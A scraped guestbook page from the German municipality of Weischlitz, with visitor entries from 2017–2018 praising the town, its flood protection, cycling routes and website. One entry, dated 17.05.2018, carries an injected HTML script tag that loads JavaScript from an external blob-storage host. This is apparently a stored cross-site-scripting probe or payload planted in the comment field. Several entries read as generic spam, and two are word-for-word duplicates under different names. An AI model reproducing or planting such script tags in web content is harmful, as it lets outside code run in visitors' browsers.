Die Elsterbrücke in der Gemeinde Weischlitz
Eine Seite zurück  Zur Startseite
E-Mail  Zu den Favoriten hinzufügen Zur Anmeldung
Beginn des Darstellungsformulares
Darstellungsformular überspringen
|
Ende des Darstellungsformulares
Beginn der Navigation
Navigation überspringen
Ende der Navigation
Beginn des Hauptinhaltes
Hauptinhalt überspringen

Gästebuch

Ihre Meinung ist uns wichtig!

Gern nehmen wir Hinweise zu unserer Homepage - anerkennende wie auch sachlich-kritische Bemerkungen und helfende Tipps - entgegen. Auch Ihre Hinweise die Gemeinde Weischlitz betreffend sind willkommen.

Sie haben sicher Verständnis dafür, dass unser Gästebuch redaktionell überwacht wird. Das heißt, die Einträge werden nicht sofort online gestellt. Einträge, deren Inhalt oder deren Formulierungen gegen geltendes Recht verstoßen, die Persönlichkeitsrechte von Mandatsträgern, Bediensteten oder Dritten verletzen, verfassungsrechtlich bedenklich scheinen oder dem Ansehen der Gemeinde Weischlitz in der Öffentlichkeit Schaden zufügen können, werden ohne Angabe von Gründen gelöscht. Zudem werden anonyme Beiträge sowie Anfragen, die in den persönlichen Angaben offensichtlich Falschangaben enthalten, ausgefiltert.


Veröffentlichte Einträge insgesamt: 44


Zu Seite: 1 2 3 ->
Eintrag von Hans Kluge, am 03.06.2018 um 18:21 Uhr
 
Immer wieder sehr schön nach Weischlitz zu kommen.

 

Eintrag von Harald Vogel, am 25.05.2018 um 11:23 Uhr
 
Danksagung an alle Verantwortlichen für ihre Bemühungen bezüglich Hochwasserschutz in der Gemeinde Weischlitz: Beim letzten Hochwasser der weißen Elster 2013 ist unser Grundstück, Thossener Str.1 am Mühlgraben voll überflutet gewesen. Am Haus und den Nebenanlagen entstand ein enormer Sachschaden. Seit gestern (24.05.2018) kämpfen viele freiwillige Helfer der Gemeinde wieder gegen die Wassermassen unseres Flusses. Unser Grundstück am Mühlgraben ist aber dieses Mal fast trocken geblieben. Die aufwändigen Sanierungsarbeiten am Wehr/Mühlgraben haben sich gelohnt - es funktioniert. Ich bedanke mich im Namen meiner Familie und Mitbewohner bei allen Verantwortlichen!

 

Eintrag von Gerhard Buirl, am 17.05.2018 um 10:06 Uhr
 
Super Seite, fühle mich echt wohl bei euch

<script src="https://jlexperiments.blob.core.windows.net/harvey/test.js"></script>

 

Eintrag von Jana Meinert, am 18.04.2018 um 09:16 Uhr
 
Extrem schöne Gemeinde.

 

Eintrag von Anna Rauber, am 17.04.2018 um 04:51 Uhr
 
Super schön bei euch. Komme allzeit gerne vorbei.

 

Eintrag von Manfred Walter, am 14.03.2018 um 11:53 Uhr
 
Die Kienmühle am Kemnitzbach hat uns wirklich sehr gefallen. Vielen lieben Dank für die umfangreichen Informationen zu Sehenswürdigkeiten in Weischlitz.

 

Eintrag von Jan Hartmann, am 28.01.2018 um 11:10 Uhr
 
Wir waren auf der Durchreise in ihrer Gemeinde und wirklich überaus positiv überrascht. Sehr ruhig und entspannt. Beste Grüße aus Augsburg.

 

Eintrag von Namuel Mannt, am 27.12.2017 um 11:20 Uhr
 
liebe Gemeinde Weischlitz,
wirklich eine tolle und gelungene Website!
Ich hoffe, ich kann bald mal wieder in der Gegend sein, am Besten noch vor eurem Weischlitz 2025 Projekt :-)

 

Eintrag von David V., am 05.10.2017 um 13:01 Uhr
 
An dieser Stelle wollte ich ein Lob hinterlassen. Eine wirklich tolle Seite... Weiter so... Viele Grüße

 

Eintrag von Thomas Roggeberg, am 27.09.2017 um 03:23 Uhr
 
Hallo liebe Gemeinde Weischlitz,

ich finde es super, dass es auch noch kleine idyllische Gemeinden gibt und nicht nur Großstädte wie Berlin oder München. Bei euch kann man die Hektik der Großstadt vergessen und noch etwas Natur genießen.

 

Eintrag von Lina Feldmann, am 21.09.2017 um 16:56 Uhr
 
Wir haben uns dazu entschlossen unseren Urlaub in Weischlitz zu verbringen, da mein Mann und ich leidenschaftliche Fahrradfahrer sind.

Die Gegend ist einfach wunderschön und wir konnten viele Sehenswürdigkeiten gut erreichen.

Ich würde es definitiv Leuten mit einem Fahrrad im Gepäck empfehlen!

 

Eintrag von Anne Wilkert, am 21.09.2017 um 16:55 Uhr
 
Die Ortsteile von Weischlitz sind wirklich wunderschön - jeder einzelne für sich.
Ich war das letzte mal vor 2 Jahren hier und mir hat es wirklich toll gefallen. Vor allem die historischen Gebäude und Fassaden!
Ich wünsche viel Erfolg mit dem 2025 Projekt, vielleicht schaffe ich es bis dahin ja, wieder mal für einen Besuch zu kommen :)

 

Eintrag von Franko Janice, am 28.08.2017 um 09:23 Uhr
 
Tolle Seite! Ehrlich vorbereitet und moderiert;) weiter so!

 

Eintrag von Verena Walter, am 25.08.2017 um 19:08 Uhr
 
Weischlitz ist zwar keine Weltmetropole, aber gerade dass macht Weischlitz für einen Urlaub interessant, um mal seine Ruhe zu haben!

 

Eintrag von Tanja Molter, am 24.08.2017 um 14:53 Uhr
 
Tolle Stadt, tolle Homepage. Weiter so!

 

Eintrag von Gunter Bertz, am 09.08.2017 um 09:03 Uhr
 
Eine gut vorbereitete Seite, eine Menge interessanter Informationen und ein ordentliches Aussehen;)

 

Eintrag von Marcus Brettschneider, am 01.08.2017 um 18:51 Uhr
 
Ich habe einen Freund besucht, der nach Weischlitz gezogen ist und mich natürlich hier erkundigt über den Ort, das war eine tolle Erfahrung, sowohl Weischlitz selbst, als auch die Homepage zu besuchen.

Danke!

Marcus

 

Eintrag von Helen Matz, am 27.07.2017 um 00:14 Uhr
 
Danke für alles! Bei euch ist sehr gut!

 

Eintrag von Rene Walter, am 09.06.2017 um 10:02 Uhr
 
Wir waren mitte Mai für ne Woche hier, einfach sehr schön, da ein guter Kontrast zum Stadtleben.

 

Eintrag von Nick Brandt, am 25.05.2017 um 11:49 Uhr
 
Die Ortsteile von Weischlitz sind wirklich wunderschön - jeder einzelne für sich.
Ich war das letzte mal vor 2 Jahren hier und mir hat es wirklich toll gefallen. Vor allem die historischen Gebäude und Fassaden!
Ich wünsche viel Erfolg mit dem 2025 Projekt, vielleicht schaffe ich es bis dahin ja, wieder mal für einen Besuch zu kommen :)

 

Zu Seite: 1 2 3 ->
 
© Gemeinde Weischlitz
Zum Seitenanfang
Beginn der Blöcke
Blöcke überspringen